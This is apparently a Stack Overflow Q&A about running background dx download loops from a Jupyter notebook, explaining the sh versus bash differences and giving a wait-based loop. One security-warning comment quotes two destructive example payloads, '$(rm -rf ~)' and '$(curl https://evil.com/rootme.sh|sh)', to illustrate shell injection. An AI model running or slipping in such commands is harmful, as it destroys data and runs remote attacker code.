# !{command} in Jupyter to run background bash processes with & operator not working, but works with bash magic operator

Tags: python-3.x, bash, jupyter

I have two bash scripts that I am running from python jupyter notebook. The only difference is the & operator in the for loop. I am calling these like this:

```
!{bash_com(i)}
```

Function 1 does not produce an output, whereas function 2 correctly runs each step in the for loop. I assume this is something to do with how jupyter is handling this operator, but I cannot work it out. I have also tried running as a bash magic cell in example 3, and this produces the correct output, exactly like function 2. What is causing this difference, and how can I work around this?

1)

```
def bash_com(num):
​
    command = '''dx download -f filepaths/COLORECTAL/colorectal_canc_paths_''' + str(num) +'''.txt
mapfile -t COLORECTAL < colorectal_canc_paths_''' + str(num) + '''.txt
for i in "${COLORECTAL[@]}";
do
    dx download -f "$i" || echo "failed" &
done
'''
    return command
```

2. 

```
def bash_com(num):
​
    command = '''dx download -f filepaths/COLORECTAL/colorectal_canc_paths_''' + str(num) +'''.txt
mapfile -t COLORECTAL < colorectal_canc_paths_''' + str(num) + '''.txt
for i in "${COLORECTAL[@]}";
do
    dx download -f "$i" || echo "failed"
done
'''
    return command
```

3. 

```
%%bash
dx download -f filepaths/COLORECTAL/colorectal_canc_paths_0.txt
mapfile -t COLORECTAL < colorectal_canc_paths_0.txt
for i in "${COLORECTAL[@]}";
do
    dx download -f "$i" || echo "failed"
done
```

Comment: Think about `while IFS= read -r i <&3; do dx download -f "$i" || echo "failed"; done 3<input.txt` as an alternative that doesn't use arrays and so doesn't require bash.

Comment: `!cmd` uses sh, not bash; on some operating systems `/bin/sh` is a symlink to `/bin/bash`, but even then it runs in a reduced-feature compatibility mode when started under the `sh` name; so `!...` and `%%bash` followed by `...` are not expected to be identical.

Comment: (revising my first comment to use `&` would be instead `while IFS= read -r i <&3; do dx download -f "$i" || echo "failed" & done 3<input.txt` -- note `&` replacing `;`, not being in addition to it)

Comment: (...that said, I'm not sure how you expect `failed` to actually be `echo`ed if the failure happens only after the loop finished and the outer shell exited, unless jupyter keeps reading until stdout hits EOF _past_ the point in time when the subprocess terminates; that's an implementation detail, and I wouldn't take bets either way -- there are good reasons to make sure one reads any stdin that's pending _immediately_ after the child exits, but something that keeps a grandchild running for a longer period muddies the waters).

Comment: (...which is to say, it wouldn't be an unreasonable implementation choice for jupyter to close stdout and stderr after the immediate child exits; you could delay that exit until after the grandchildren are complete by `wait`ing for the forked-off children)

Comment: This is very good thank you! Does the while IFS methodology allow background processing with  & operator or is that a bash specific operator that isn't supported in baseline sh?

EDIT, I have just seen your revision! Thank you! In my testing, it does appear to echo failed immediately via jupyter, but will confirm further.

Comment: `&` is not bash-only; it's completely legal in sh.

Comment: ...so to explicitly tell the shell to hang out until the subprocesses running dx complete in sh, without making assumptions about that sh implementation's job control, might look something like `pids=''; while IFS= read -r i <&3; do dx download -f "$i" & pids="$pids $!"; echo "Downloading $i with PID $!"; done 3<input.txt; IFS=' '; for pid in $pids; do wait "$pid" || echo "WARNING: pid $pid failed with exit status $?"; done`. In bash, I'd make pids an array, but in sh arrays aren't guaranteed to be supported, so expanding a string unquoted is the choice we have.

Comment: (indeed, _in modern bash_ I'd make `pids` an array storing `$i` as the value and `$!` as the key; that removes any need to have an `echo "failed"` in the loop altogether and lets one look up which file was being downloaded by a process that failed after-the-fact)

Comment: Jupyter is a good fit for a lot of things. Running things in the background is not one of them. It's meant to be interactive. Jupyter developed out of IPython where the '`I`' was for 'interactive'.

Comment: BTW, let me know if you test the above suggestions to work; I'll add a proper answer if they do.

Comment: @Wayne I agree, unfortunately due to the limitations of the project I am working on, I am somewhat limited to Jupyter!

Comment: @CharlesDuffy 

`pids=''; while IFS= read -r i <&3; do dx download -f "$i" & pids="$pids $!"; echo "Downloading $i with PID $!"; done 3<input.txt; IFS=' '; for pid in $pids; do wait "$pid" || echo "WARNING: pid $pid failed with exit status $?"; done`

This implementation that you suggested worked perfectly, thank you! I tested it for this use case and the output was exactly as expected.

Comment: BTW, when substituting data into a somewhere it'll be parsed as code by a shell interpreter, think about using `shlex.quote()` to ensure that it gets escaped in such a way as to parse back to the original value; otherwise if your data passes through malicious hands (is unexpectedly writable by an attacker, is corrupted by error or accident, &c) you don't have something like `$(rm -rf ~)` on `$(curl https://evil.com/rootme.sh|sh)` being executed. (I was present for a major data loss event once in a prior job that was just caused by memory corruption in a C extension used by a Python module)

Comment: (...in that past-life event it was just bad luck as opposed to malicious intent, and then sloppy code that didn't make efforts to be safe against either; but when I'm wearing my security hat and take part in a red-team exercise, I _absolutely_ am on the lookout for places where data consumed by poorly-written scripts run with more permissions than the account I already have access to can be used for privilege escalation).

Answer (score 1, accepted):

There are a few things that could be going on here -- and only one of them is specific to `&`.

- `!` uses `/bin/sh`, not bash; the shells are different, and support different syntax (even when they're provided by the same executable, bash runs in a limited-function compatibility mode when started under the `sh` name; and on many common distros `sh` is implemented by ash, dash, or another non-bash shell altogether).
- If Jupyter's authors want to prevent cells' runtime processes from continuing indefinitely after the program that was started exits (should that program pass its stdin, stdout, or stderr to something that *doesn't* exit when its parent does), it may close those file descriptors, which would have the effect of causing still-running child processes to fail the next time they try to do a read or write.

To address both these problems, you can rewrite your code to avoid bash-only features, and make the parent shell `wait` for the child processes it starts to finish before exiting.

Note the removal of `mapfile` (and equivalents like `readarray`), as arrays are a bash extension not guaranteed to be available in `/bin/sh` (and `mapfile` is moreover specific to bash 4.0+).

(The use of file descriptor 3 avoids redirecting from stdin within the loop -- as would otherwise be default -- so that if `dx` tries to read from stdin it doesn't consume parts of the input file).

```
pids='' # not strictly necessary, but good form: initialize to empty string

# loop over file content, run a download for each
while IFS= read -r i <&3; do
  dx download -f "$i" & pids="$pids $!"
  echo "Downloading $i with PID $!" >&2
done 3<colorectal_canc_paths_0.txt

# ensure that even if IFS is non-default, we split pids on spaces when expanding unquoted
IFS=' '

for pid in $pids; do
  wait "$pid" || echo "WARNING: pid $pid failed with exit status $?"
done
```

The loop doing the final `wait` ensures that we don't exit until after our child processes do.